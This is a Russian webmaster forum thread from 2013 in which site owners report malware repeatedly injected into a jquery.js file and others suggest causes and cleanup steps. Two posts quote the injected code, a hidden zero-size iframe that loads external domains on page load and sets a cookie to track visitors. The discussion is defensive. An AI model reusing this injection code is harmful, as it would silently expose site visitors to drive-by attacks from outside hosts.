X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Постоянно прописывается вирус в файле
Intersect
Intersect
Topic Starter сообщение 28.8.2013, 2:03; Ответить: Intersect
Сообщение #1


Здравствуйте, постоянно прописываются разнообразные вирусы в файле: /engine/classes/js/jquery.js

удаляю уже раз так 5-тый

всегда кода разные, на этот раз: var if4RVLf = document.createElement('iframe');if4RVLf.name = 'if4RVLf';if4RVLf.src = 'http://retopen.9stud.io/';

что делать, может права к папке ограничить, подскажите?


--------------------
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
kagtus
kagtus
сообщение 28.8.2013, 8:21; Ответить: kagtus
Сообщение #2


взлом не понятный, смена прав не помогает, надо логи анализировать...


--------------------
ася 45два48499два
удалю вирусы, помогу с сайтом ->отзывы ТУТ и ТАМ
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Ultrastalker
Ultrastalker
сообщение 28.8.2013, 8:51; Ответить: Ultrastalker
Сообщение #3


Intersect, как вариант рекомендую (при наличии на вашем компьютере заранее заданного FTP-доступа) изменить к нему пароль на заведомо неверный, добавив к нему несколько любых лишних символов в начале и (или) в конце и в дальнейшем при каждом подключении после запроса о перевводе пароля удалять из последнего лишние символы. Основание совета: вирусняки, портящие js-файлы, частенько прописываются на локальном компьютере и ищут доступные FTP-подключения, которыми и пользуются для поиска уже на сервере js-скриптов (но не только их), с целью их перезаписи.


--------------------
Счастье для всех, даром, и пусть никто не уйдёт обиженным!
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
mmkulikov
mmkulikov
сообщение 28.8.2013, 8:55; Ответить: mmkulikov
Сообщение #4


(Intersect @ 28.8.2013, 0:03) *
/engine/classes/js/jquery.js

Какие права выставлены на этот файл?


--------------------
Сдается, обращаться скайп avdesk-it-kmm
VPS от 5€
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
seomasters
seomasters
сообщение 28.8.2013, 9:40; Ответить: seomasters
Сообщение #5


Да просто основной вирус в другом файле, и он прописывает в этот фаил то что вы удаляете уже в 5й раз. Ищите источник.


--------------------
клоновод
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
viston
viston
сообщение 28.8.2013, 10:38; Ответить: viston
Сообщение #6


Ну да скорей вирус в другой папке , все файлы проверите . У меня было такое на хостинге 15 сайтов было все почистил уже с пол года как проблем небыло.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
MorKer
MorKer
сообщение 28.8.2013, 11:26; Ответить: MorKer
Сообщение #7


(Intersect @ 28.8.2013, 1:03) *
разнообразные вирусы в файле

Владелец файла apache?

(Intersect @ 28.8.2013, 1:03) *
что делать

Произвести стандартные действия:
1. Обновить cms.
2. Удалить модули и плагины сомнительного происхождения. Модули и плагины из надежных источников обновить до последних версий.
3. Скачать сайт на локальный ПК и проверить антивирусом.

Сайт должен работать на последней версии cms, скачанной с официального сайта. Аналогичное требование к плагинами и модулями.

Вы видимо либо не обновили своевременно cms, либо установили модули/плагины сомнительного происхождения. Вот и получили регулярные взломы.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Intersect
Intersect
Topic Starter сообщение 28.8.2013, 21:42; Ответить: Intersect
Сообщение #8


(mmkulikov @ 28.8.2013, 7:55) *
/js/jquery.js
Какие права выставлены на этот файл?

стоит 755

эмм..всем спасибо за версии, попробуем что-то исправить))


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
prostohost
prostohost
сообщение 30.8.2013, 8:50; Ответить: prostohost
Сообщение #9


Вы ищите совета или человека который решит проблему?
Если последнее - то пишите в ЛС.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
montrey
montrey
сообщение 30.8.2013, 9:06; Ответить: montrey
Сообщение #10


(Intersect @ 28.8.2013, 2:03) *
Здравствуйте, постоянно прописываются разнообразные вирусы в файле: /engine/classes/js/jquery.js

Такая же проблема 4 аккаунта на хостинге, на всех сайтах код приведенный ниже, причем cms сайта не имеет значения, заражает все сайты . Причем дата изменения должна быть в этом месяце, но показывает дату изменения 2011-2012 год, хотя есть сайты которые пару месяцев назад залил.
;var ifstOB = document.createElement('iframe');ifstOB.name = 'ifstOB';ifstOB.src = 'http://asurt.toutges.com/';ifstOB.style.width = '0px';ifstOB.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('ifstOB=') == -1) { document.getElementsByTagName('body')[0].appendChild(ifstOB);var expiresDate = new Date(); expiresDate.setTime(expiresDate.getTime() + 432000000); document.cookie = 'ifstOB=yes; path=/; expires=' + expiresDate;}};


(Ultrastalker @ 28.8.2013, 8:51) *
как вариант рекомендую (при наличии на вашем компьютере заранее заданного FTP-доступа) изменить к нему пароль на заведомо неверный, добавив к нему несколько любых лишних символов в начале и (или) в конце и в дальнейшем при каждом подключении после запроса о перевводе пароля удалять из последнего лишние символы. Основание совета: вирусняки, портящие js-файлы, частенько прописываются на локальном компьютере и ищут доступные FTP-подключения, которыми и пользуются для поиска уже на сервере js-скриптов (но не только их), с целью их перезаписи.

Какой уровень доступа надо иметь, чтобы не затрагивать дату изменения? либо дату изменения ставить 2011-2012 год?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Требуется копирайт, много и постоянно. Хостинг тематика.
7 wep 2536 16.6.2020, 20:39
автор: mark2013
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыИщу копириайтера на постоянно (тема: живопись)
Разбираться в теме обязательно!
1 palladin90 1621 23.4.2020, 17:51
автор: pishu-text
Открытая тема (нет новых ответов) Постоянно заинтересован в обмене QIWI > ADVCash
0 FishBone 2878 6.6.2018, 22:33
автор: FishBone
Открытая тема (нет новых ответов) Плачу 150 рублей за 1 онлайн заявку. Набираю команду. Раз в месяц! Постоянно!
3 rek01 1682 16.10.2017, 10:15
автор: rek01
Открытая тема (нет новых ответов) На постоянно нужен копирайтер/рерайтер для наполнения автомобильного сайта.
Наполнение сайта автомобильной тематики новостями.
4 N_73 2776 13.8.2017, 1:12
автор: Arwis


 



RSS Текстовая версия Сейчас: 29.3.2024, 5:31
Дизайн